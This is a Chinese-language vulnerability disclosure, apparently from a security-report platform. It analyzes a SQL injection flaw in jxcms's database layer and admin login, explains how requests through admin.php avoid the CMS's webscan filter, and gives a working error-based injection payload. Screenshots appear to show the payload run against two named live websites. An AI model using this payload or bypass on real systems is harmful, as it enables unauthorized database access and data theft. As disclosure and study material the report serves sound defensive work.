### 简要描述:
底层模型解析出错,导致大面积注入。
这是真的注入,真的能注出数据的。
无视新版添加的webscan.class.php
### 详细说明:
找注入,上来就看sql语句是怎么处理的。
jxcms的model调用数据库操作无论是
->where
->find
都会调用/jxcms/lib/core/db.class.php文件中的checkOneWhere函数进行组装与过滤。
```
private function checkOneWhere($str) {
$tmp = preg_replace('/(["|\']).*?\\1/s', '', $str);
$tmp = strtoupper($tmp);
if (strstr($tmp, ' BETWEEN ')) $tmp = preg_replace('/ AND /', '', $tmp, 1);
// 不是单个条件直接返回
if (strstr($tmp, ' AND ') || strstr($tmp, ' OR ') || strstr($tmp, ' XOR ')) return $str;
//主要是这里,发现AND OR XOR就会直接返回,而不会进过后面的parseValue()函数
// 规范化IN
$tmp = strtok($str, '"\'');
if (stristr($tmp, ' IN(')) {
$tmp = preg_replace('/ IN\(/i', ' IN (', $tmp, 1);
$str = preg_replace('/ IN\(/i', ' IN (', $str, 1);
}
foreach(array('!=', '>=', '<=', '=', '>', '<', ' NOT IN ', ' IN ', ' NOT LIKE ', ' LIKE ', ' BETWEEN ') as $comp) {
if (stristr($tmp, $comp)) {
$t = explode($comp, $str, 2);
$field = $this -> addSpecialChar($t[0]);
$value = trim($t[1]);
if (is_string($value)) {
$first = substr($value, 0, 1);
if ($first == '"' || $first == '\'') {
$value = substr($value, 1, -1);
if (!stristr($comp, ' IN ')) $value = $this -> parseValue($value);
} else {
if (!(stristr($comp, ' IN ') || (strpos($field, '.', 1) && strpos($value, '.', 1)))) {
$value = $this -> parseValue($value);
}
}
}
return "$field $comp $value";
}
}
return $str;
}
```
这样随便找一个可控的find()就行了。
另一个问题:
webscan.class.php
貌似是最新版新加的,不去绕过了,直接找无视的方式。
可以找到jxcms/common.php中存在:
```
import('Lib/Core/App', 'jxcms');
import('Lib/Core/Base', 'jxcms');
if (C('WEBSCAN', 1) && !defined('IN_ADMIN')) Webscan :: run();
只要是后台操作就不开启
```
那就去admin.php文件调用,此处当然不会是后台注入。
就是后台登录位置即可。
```
public function login() {
if ($this -> isSubmit) {
if (C('captcha_admin_login', 0, 'member')) {
$captcha = new Captcha();
$captcha -> check(trim($_POST['captcha'])) or $this -> showMsg(L('CAPTCHA_ERROR'));
}
$memberObj = M('member');
$username = trim($_POST['username']); //未过滤
$password = md5(trim($_POST['password']));
$field = array('userid', 'username', 'password', 'email', 'lastdate', 'groupid');
$where = array('username' => $username, 'groupid' => 1);
$r = $memberObj -> field($field) -> where($where) -> find(); //where直接带入
if ($r) {
if ($r['password'] == $password) {
// 后台登陆信息
$loginInfo = array('userid' => $r['userid'], 'username' => $r['username'], 'email' => $r['email'], 'lastdate' => $r['lastdate'], 'groupid' => 1, 'role' => $memberObj -> getRole($r['userid']), 'hash' => Func :: getHash($username . $password));
// 前台登陆信息
$userInfo = array('userid' => $r['userid'], 'username' => $r['username'], 'email' => $r['email'], 'lastdate' => $r['lastdate'], 'groupid' => 1, 'password' => $password);
M('member') -> setLogin($userInfo);
$_SESSION[C('DB_PREFIX', 1) . 'loginInfo'] = serialize($loginInfo);
$this -> showMsg(L('LOGIN_SUCCESS'), '?a=defaults');
} else $this -> showMsg(L('PASSWORD_ERROR'), '?a=login');
} else $this -> showMsg(L('USERNAME_IS_NOT_EXIST'), '?a=login');
}
$this -> display('login');
}
```
### 漏洞证明:
后台登录提交数据包:
submit=1&username='testtest' AND extractvalue(1, concat(0x5c,(select user())));-- 1&password=testtest&captcha=ckxn&subimg.x=32&subimg.y=24
这里是不过滤的,所以里面的语句是任意的。这里只是举例,注意验证码。
本地最新版:
[<img src="https://images.seebug.org/upload/201503/311700007d91d78ad0a426b1d65f155627cbaffc.png" alt="1111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/311700007d91d78ad0a426b1d65f155627cbaffc.png)
http://test.tzks.cn/
[<img src="https://images.seebug.org/upload/201503/31170141c7647fe15988f96f2bea25a5e71633aa.png" alt="2222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/31170141c7647fe15988f96f2bea25a5e71633aa.png)
www.gsdedu.com
[<img src="https://images.seebug.org/upload/201503/31170324d1af271c29fd6ceafdb8927ad42bcbea.png" alt="4444.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/31170324d1af271c29fd6ceafdb8927ad42bcbea.png)
京公网安备 11010502034610号
暂无评论